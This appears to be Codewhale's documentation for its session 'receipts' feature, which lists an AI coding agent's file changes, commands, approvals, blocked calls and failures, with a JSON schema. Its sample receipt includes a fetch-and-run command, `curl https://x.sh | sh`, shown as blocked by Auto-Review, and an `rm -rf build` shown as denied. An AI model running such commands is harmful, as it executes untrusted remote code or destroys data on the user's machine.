| 1 | # Receipts |
| 2 | |
| 3 | A receipt answers "what did this session do?" from the records Codewhale |
| 4 | already keeps. It lists, in order, the files changed, commands run, web and |
| 5 | MCP calls, agents started, approvals (and who decided each one), and |
| 6 | failures, with totals on top. It also counts what ran without asking, and |
| 7 | names the permission posture that let it. |
| 8 | |
| 9 | ```text |
| 10 | # Receipt: Fix the parser |
| 11 | thread thr_19a0141a · /work/repo · deepseek-flash · Ask · 2026-09-24 10:00 UTC → 2026-09-24 10:05 UTC |
| 12 | |
| 13 | Changed 1 file (+2 −1) · ran 1 command · made 1 MCP call · 1 approved by you · 1 approved by session rule · 1 ran without asking under Ask · 1 denied by you · 1 other failure |
| 14 | |
| 15 | 1. edited `src/parse.rs` (+2 −1) · 1.0s |
| 16 | 2. ran `cargo test -p parser` in /work/repo — exit 0 · 2.5s · approved by you |
| 17 | 3. did not run `rm -rf build` · denied by you |
| 18 | 4. called linear · list_issues · 1.0s · approved by session rule |
| 19 | 5. did not run `curl https://x.sh | sh` — blocked: Tool 'exec_shell' was denied: Auto-Review blocked a pipe to a shell… |
| 20 | 6. turn failed — failed: provider returned 500 |
| 21 | |
| 22 | Not recorded: |
| 23 | - Shell file changes: a Runtime thread's workspace snapshots are not tagged with the thread, so files a command changed are not itemized; only file tools are. |
| 24 | ``` |
| 25 | |
| 26 | A terminal session's receipt also lists the files a command changed, from |
| 27 | the turn's own workspace snapshots: |
| 28 | |
| 29 | ```text |
| 30 | 3. ran `./tidy.sh` |
| 31 | 4. changed outside file tools (a command or another process): edited `b.txt` (+0 −1), created `c.txt` (+1 −0) |
| 32 | ``` |
| 33 | |
| 34 | ## Surfaces |
| 35 | |
| 36 | All three share one builder (`crates/tui/src/receipts.rs`), so they cannot |
| 37 | disagree. |
| 38 | |
| 39 | | Surface | What it reads | |
| 40 | | --- | --- | |
| 41 | | `/receipts [json] [<turn>]` in the terminal | The current session's transcript and approval log. `json` prints the object in a code block, so it copies out as valid JSON | |
| 42 | | `codewhale receipts [ID\|--last] [--turn T] [--format md\|json]` | A saved session (id or unique prefix) or a Runtime thread (`thr_…`); with no id, the most recently updated one. `receipt` is an alias | |
| 43 | | `GET /v1/threads/{id}/receipt`, `GET /v1/threads/{id}/turns/{turn_id}/receipt` | A Runtime thread (the app, `codewhale serve`), behind the normal `/v1` bearer boundary | |
| 44 | |
| 45 | All three only read. They never call a provider, run a tool, write a file, |
| 46 | or change runtime state. |
| 47 | |
| 48 | `codewhale receipts` reads Runtime threads from the machine's default store |
| 49 | (`tasks/runtime/`, or `$CODEWHALE_RUNTIME_DIR`). A thread kept in one |
| 50 | terminal session's own store (`sessions/<id>/runtime/`) is not found by id; |
| 51 | the API reads whatever store its server owns. |
| 52 | |
| 53 | ## Where the facts come from |
| 54 | |
| 55 | | Session kind | Record | Holds | |
| 56 | | --- | --- | --- | |
| 57 | | Terminal session | `sessions/<id>.json` | Every tool call and its result text, in order; each prompt's `<turn_meta>` names the posture the turn ran under | |
| 58 | | Terminal session | `sessions/<id>/approval_receipts.jsonl` | Every approval ask and decision, with time and who decided | |
| 59 | | Runtime thread | `tasks/runtime/turns`, `items` | Every tool call with its input, status, start and end time, and structured result (exit code, diff, agent status); each turn's `permission_posture` | |
| 60 | | Runtime thread | `tasks/runtime/events/<thread>.jsonl` | `approval.required` / `approval.decided`, with the flags that say who decided | |
| 61 | |
| 62 | ### Who decided an approval |
| 63 | |
| 64 | | Receipt says | Meaning | Recorded as | |
| 65 | | --- | --- | --- | |
| 66 | | approved by you / denied by you | A person answered: the terminal card, the app, the web mirror, or an API client acting for them | `decided_by: "user"`; Runtime event with no `auto` flag | |
| 67 | | … by session rule | A remembered "for this session" rule answered | `decided_by: "session_rule"`; Runtime event with `auto` and a `grant_id` | |
| 68 | | … by posture | The mode or permission posture answered without a prompt | `decided_by: "posture"`; Runtime event with `auto` or `posture` | |
| 69 | | approval timed out | The card expired unanswered | outcome `timeout` | |
| 70 | | turn stopped while waiting / nobody could be asked | Codewhale could not ask anyone: the turn had ended or stopped, or the request never reached a person. Counted as not answered, never as a denial, even where the record says `denied` | `decided_by: "host"` | |
| 71 | | approved / denied, with no "by" | A record written before 0.10.1, or a sub-agent's request. The totals say "(decider not recorded)" | no `decided_by` | |
| 72 | |
| 73 | The totals line counts approvals and denials separately, by who gave them: |
| 74 | `1 approved by you · 1 denied by you` is two decisions. |
| 75 | |
| 76 | ### Ran without asking |
| 77 | |
| 78 | Most calls never produce an approval. Under Full Access nothing asks; under |
| 79 | Ask, reads and allowed tools run without a prompt, and a remembered rule can |
| 80 | skip one. Those calls leave no approval record, so the receipt counts them |
| 81 | instead: `ran_without_asking` is every file change, command, code run, web |
| 82 | or MCP call, and agent start that ran with no approval on record. The totals |
| 83 | line names the postures the turns ran under (`9 ran without asking under |
| 84 | Full Access`). Reads are not counted, and neither is a call that did not |
| 85 | start (below). |
| 86 | |
| 87 | ### Blocked before it ran |
| 88 | |
| 89 | Codewhale answers a call it will not run with an error result, the same way |
| 90 | a tool reports a failure: an Auto-Review or guardian block, a tool-policy or |
| 91 | allow-list denial, a sandbox escalation the posture cannot grant, input that |
| 92 | did not parse, or a tool that is not available. None of these writes an |
| 93 | approval, so a receipt reads the result itself: |
| 94 | |
| 95 | - **Blocked:** the result is Codewhale's own refusal text (`Tool 'x' was |
| 96 | denied: …`, `Invalid input for tool …`, `BLOCKED: …`, a validation |
| 97 | feedback line with `"side_effect_status":"not_started"`, or a Runtime |
| 98 | thread's `Failed to authorize tool execution: …`). Listed as |
| 99 | `did not run … — blocked: <reason>`, status `blocked`, counted in |
| 100 | `blocked` (`N blocked before running` in the totals line), and never as |
| 101 | run, failed, or ran without asking. Every permission denial the engine |
| 102 | writes keeps the `Tool 'x' was denied:` lead, including ones that name |
| 103 | their own fix (Plan mode, `allow_shell`); sessions saved before 0.10.1 |
| 104 | wrote some of those without it, and such a call reads as a failure. |
| 105 | - **Only Codewhale's own words count.** An MCP server's or GitHub's reply, |
| 106 | a fetched page, a program's output (code tools), and a sub-agent's words |
| 107 | can say anything, so a failed call to one of those is judged by the |
| 108 | metadata Codewhale wrote for it, never its text: an MCP server that |
| 109 | answers `BLOCKED: …` or `{"side_effect_status":"not_started"}` is listed |
| 110 | as a failed call that ran. `BLOCKED:` counts only from the shell tools, |
| 111 | and the validation feedback line only as the result's last line. |
| 112 | - **Stopped at an approval prompt with no approval record** (a sub-agent, |
| 113 | or a session older than the approval log): the result says |
| 114 | `Tool 'x' denied by user`, which the engine also writes when nobody could |
| 115 | be asked. Listed as `did not run …` with no decider, since the text does |
| 116 | not prove who said no. |
| 117 | - **Ran and failed:** the result holds an exit code or a line the shell |
| 118 | writes only after a process ran (`Command exited with code N`, |
| 119 | `Command failed (exit code N)`, a timeout or cancel line). Counted as a |
| 120 | command and a failure. |
| 121 | - **Not shown either way:** a command whose error has neither. Listed as |
| 122 | `tried to run … — error, no exit code: <error>`, status `unknown`, not |
| 123 | counted as run, with a `not_recorded` note. Other tools that return an |
| 124 | error are counted as failures, since the error came from the tool. |
| 125 | |
| 126 | Terminal sessions started before 0.9.10 (2026-08-20) have no approval log, |
| 127 | so their receipts do not count this and say why. |
| 128 | |
| 129 | ### Not recorded |
| 130 | |
| 131 | The receipt says so instead of guessing: |
| 132 | |
| 133 | - **Shell file changes in a Runtime thread.** A terminal session reads the |
| 134 | files a command changed from the workspace snapshots Codewhale takes |
| 135 | before and after each turn (`git diff` between the two, inside the |
| 136 | snapshot side repo; at most 50 paths a turn). A Runtime thread's snapshots |
| 137 | are not tagged with the thread, so its receipt lists only file tools. A |
| 138 | terminal turn with no snapshot pair (snapshots off, the workspace too large |
| 139 | for them, or pruned: the newest 50 are kept) says so. A snapshot |
| 140 | difference covers anything that wrote to the workspace during the turn, |
| 141 | including you or another program, not only the command. It leaves out |
| 142 | what snapshots do not track: ignored and skipped paths (`.gitignore` |
| 143 | entries, `.env`, `node_modules`, `target`, and the like) and anything |
| 144 | outside the workspace (`~/.ssh`, `/tmp`), so an empty list does not mean |
| 145 | a command wrote nothing. A turn is matched to its snapshots by its prompt; |
| 146 | when another turn has the same prompt ("continue"), the snapshots' turn |
| 147 | number must agree too, or the turn is counted as having no pair rather |
| 148 | than given another turn's files. Paths print with control characters |
| 149 | escaped (`\n`, `\u{1b}`), so a file name cannot add a line to the |
| 150 | receipt or send the terminal an escape sequence. |
| 151 | - **Terminal-session exit codes, durations, and timestamps.** A terminal |
| 152 | session saves each call and its result text, not the structured result. A |
| 153 | failed shell call's exit code is read from the shell tool's own closing |
| 154 | line (`Command exited with code N`); a passing one shows no code. |
| 155 | - **Line counts for whole-file writes** in terminal sessions, and whether the |
| 156 | file existed before. |
| 157 | - **Who decided** for approvals recorded before 0.10.1 and for sub-agent |
| 158 | approvals. |
| 159 | - **Which calls asked first** in terminal sessions started before 0.9.10. |
| 160 | - **Whether a failed command started** when its error has no exit code and |
| 161 | no shell status line, and whether a call with no result ran at all. |
| 162 | - **Why a call ran without asking** beyond the turn's posture: the record |
| 163 | does not say whether the posture, an allow rule, or a remembered grant let |
| 164 | it through. |
| 165 | |
| 166 | ## Non-Goals |
| 167 | |
| 168 | A receipt is not a safety certification, a provider compatibility |
| 169 | certification, or a hosted attestation (`claim_ceiling` in the JSON says so). |
| 170 | It exports no reasoning text and no raw tool output. Commands, search |
| 171 | queries, and error lines are bounded (200, 120, and 160 characters) and pass |
| 172 | through the shared secret redactor. A receipt lists at most 2,000 actions; |
| 173 | totals always cover every action, and `omitted_actions` counts the rest. |
| 174 | |
| 175 | ## JSON shape |
| 176 | |
| 177 | `--format json`, `/receipts json`, and the API return the same object: |
| 178 | |
| 179 | ```json |
| 180 | { |
| 181 | "schema_id": "codewhale.receipt/v1", |
| 182 | "source": { |
| 183 | "kind": "thread", |
| 184 | "id": "thr_19a0141a", |
| 185 | "title": "Fix the parser", |
| 186 | "workspace": "/work/repo", |
| 187 | "model": "deepseek-flash", |
| 188 | "started_at": "2026-09-24T10:00:00Z", |
| 189 | "updated_at": "2026-09-24T10:05:00Z" |
| 190 | }, |
| 191 | "postures": ["Ask"], |
| 192 | "totals": { |
| 193 | "files_changed": 1, "files_changed_outside_file_tools": 0, |
| 194 | "files_created": 0, "files_deleted": 0, |
| 195 | "lines_added": 2, "lines_removed": 1, "line_counts_complete": true, |
| 196 | "commands": 1, "commands_failed": 0, "code_runs": 0, "network": 0, |
| 197 | "mcp_calls": 1, "plugin_calls": 0, "subagents": 0, |
| 198 | "approvals": { |
| 199 | "total": 3, "approved": 2, "denied": 1, "timed_out": 0, |
| 200 | "not_answered": 0, "pending": 0, |
| 201 | "approved_by": { "you": 1, "session_rule": 1, "posture": 0, "not_recorded": 0 }, |
| 202 | "denied_by": { "you": 1, "session_rule": 0, "posture": 0, "not_recorded": 0 } |
| 203 | }, |
| 204 | "ran_without_asking": 1, "failures": 1, "blocked": 1, |
| 205 | "other_tool_calls": 0 |
| 206 | }, |
| 207 | "actions": [ |
| 208 | { |
| 209 | "seq": 2, "turn": "turn_1", "at": "2026-09-24T10:02:00Z", |
| 210 | "call_id": "call_test", "tool": "exec_shell", |
| 211 | "kind": "command", "command": "cargo test -p parser", |
| 212 | "cwd": "/work/repo", "exit_code": 0, |
| 213 | "status": "ok", "duration_ms": 2500, |
| 214 | "approval": { |
| 215 | "decision": "approved", "decided_by": "user", |
| 216 | "at": "2026-09-24T10:01:59Z" |
| 217 | } |
| 218 | } |
| 219 | ], |
| 220 | "omitted_actions": 0, |
| 221 | "not_recorded": ["Shell file changes: …"], |
| 222 | "claim_ceiling": [ |
| 223 | "local_record_only", |
| 224 | "not_safety_certification", |
| 225 | "not_provider_compatibility_certification" |
| 226 | ] |
| 227 | } |
| 228 | ``` |
| 229 | |
| 230 | `kind` is one of `file_change` (`files[]` with `path`, `change` = |
| 231 | `edited|created|deleted|written`, optional `lines_added`/`lines_removed`), |
| 232 | `workspace_change` (`files[]` a turn's snapshots show changed that no file |
| 233 | tool names, and `truncated` when more than 50 did), `command` (`command`, `cwd`, `exit_code`), `code` (`exit_code`, `nested[]` |
| 234 | tool calls an `execute_tools` program made), `network` (`action`, `host`, |
| 235 | `query`), `mcp` (`server`, `plugin`), `subagent` (`name`, `agent_id`, |
| 236 | `outcome`), `approval` (an approval with no matching call), `tool` (any other |
| 237 | call, listed only when it failed), or `turn_failed`. `status` is `ok`, |
| 238 | `failed` (ran and failed), `not_run` (held at approval), `blocked` |
| 239 | (refused before it started; the reason is in `error`), `interrupted`, |
| 240 | `running`, or `unknown` (no result, or a command error that does not show |
| 241 | whether it started). A terminal session's `turn` is the turn number; a |
| 242 | thread's is the turn id. `/receipts 7` or `--turn 7` for a turn the session |
| 243 | does not have is an error, not an empty receipt. |
| 244 | |
| 245 | ## `audit.log` is not the receipt |
| 246 | |
| 247 | `~/.codewhale/audit.log` is a security-event log: credential saves and |
| 248 | clears, hook environment key names, compaction passes, goal completions, the |
| 249 | terminal's own approval routing, Auto-Review verdicts (`tool.gate.decision`, |
| 250 | since 0.10.1), and outbound network decisions when `[network]` auditing is |
| 251 | on. It has never held commands or file changes, and |
| 252 | turns run by the app or `codewhale serve` write no approvals there. Their |
| 253 | approvals are in the session's `approval_receipts.jsonl` and the thread's |
| 254 | event log, which is where receipts read them. |
| 255 | |
| 256 | A quiet `audit.log` does not mean nothing ran. It gets an approval line only |
| 257 | when the terminal routes an approval request. Since 0.8.66 |
| 258 | (`1c68e3bb32`, 2026-06-29) the engine decides auto-allowed calls itself, so |
| 259 | they never become requests; under Full Access almost nothing does. On one |
| 260 | developer machine the last `tool.approval.*` line was written on 2026-08-19, |
| 261 | the last `tool.approval.auto_approve` line on 2026-06-30, and the writes |
| 262 | after that were test runs, which since `244368675b` go to a scratch log. Use |
| 263 | a receipt to see what ran. |
| 264 | |
| 265 | ## Review Receipts |
| 266 | |
| 267 | `codewhale review --write-receipt` writes a local JSON receipt for the reviewed |
| 268 | diff under the Codewhale state directory (`review-receipts/`) unless |
| 269 | `--receipt-path <path>` is provided. This is a pre-push handoff artifact: it |
| 270 | records what diff was reviewed and what the review reported, without pushing, |
| 271 | tagging, opening a PR, or claiming to replace maintainer review. |
| 272 | |
| 273 | The current receipt includes: |
| 274 | |
| 275 | - `diff_fingerprint`: SHA-256 of the reviewed diff. |
| 276 | - `provider` and `model`: the routed review provider/model. |
| 277 | - `checks_run`: local checks attached to the receipt when available. Empty |
| 278 | means no checks were attached; attached checks must report a passing status. |
| 279 | - `findings`: structured issue/suggestion counts and issue locations when the |
| 280 | review output is structured. |
| 281 | - `unresolved_risk`: a conservative summary derived from unresolved findings. |
| 282 | - `review_content_sha256`: SHA-256 of the review text. |
| 283 | - `coverage` (PR receipts): the exact base/head and complete-diff |
| 284 | fingerprint, ordered per-pass diff fingerprints/file counts, and one |
| 285 | response-content hash for every completed pass. Manifest-backed PR receipts |
| 286 | use schema version 2 so older readers reject rather than misinterpret them. |
| 287 | |
| 288 | The receipt deliberately does not include the raw diff body. Re-run |
| 289 | `codewhale review --write-receipt` after changing the diff; reviewers should |
| 290 | compare the `diff_fingerprint` before reusing a receipt in a PR handoff. |
| 291 | |
| 292 | `codewhale review --check-receipt` is the local pre-push gate. It does not call |
| 293 | a model; it compares the current diff fingerprint with a supplied receipt |
| 294 | (`--receipt-path <path>`) or the latest matching local receipt. The check exits |
| 295 | nonzero when the diff no longer matches, the receipt schema is unsupported, the |
| 296 | receipt has unresolved risk, or an attached check did not pass. |
| 297 | |
| 298 | By default receipt generation rejects a PR that needs more than one |
| 299 | `--max-chars` pass before calling a model. An explicit `--max-passes N` admits |
| 300 | at most N complete ordered PR passes; any missing, malformed, reordered or |
| 301 | stale pass prevents a receipt. Receipt checking is provider-free and validates |
| 302 | the exact stored manifest without authorizing another run. Neither mode |
| 303 | fingerprints a truncated prefix. A receipt for |
| 304 | `review --base <base-sha> --path <path>` covers only that selected path at the |
| 305 | checked-out revision; validate it with the same base, path, and input limit. |
| 306 | It does not cover the rest of a pull request or prove that separately reviewed |
| 307 | changes work together. |
| 308 | |
| 309 | ## Builder Rules |
| 310 | |
| 311 | The builder is deterministic and conservative: |
| 312 | |
| 313 | 1. A thread receipt loads the thread, its turns, the items each turn lists |
| 314 | (plus items that name the turn but are not listed yet, for a live turn), |
| 315 | and the thread's `approval.*` events. A turn id from another thread is |
| 316 | rejected. |
| 317 | 2. A session receipt reads `tool_use`/`tool_result` pairs from the |
| 318 | transcript and replays the approval log; a log that does not replay is |
| 319 | reported, not half-used. |
| 320 | 3. Approvals attach to their call by tool call id. One with no matching call |
| 321 | is listed on its own. |
| 322 | 4. File changes come from a tool's structured mutation record (the applied |
| 323 | diff) when saved, otherwise from the call's own input (an edit's |
| 324 | replacement text, a patch's hunks). A failed call changed nothing and |
| 325 | carries no counts. |
| 326 | 5. Nothing is derived from model prose. Two fixed kinds of text Codewhale |
| 327 | itself writes are read: the shell's status lines (for an exit code) and |
| 328 | its refusal text (for a call it blocked); see "Blocked before it ran". |
| 329 |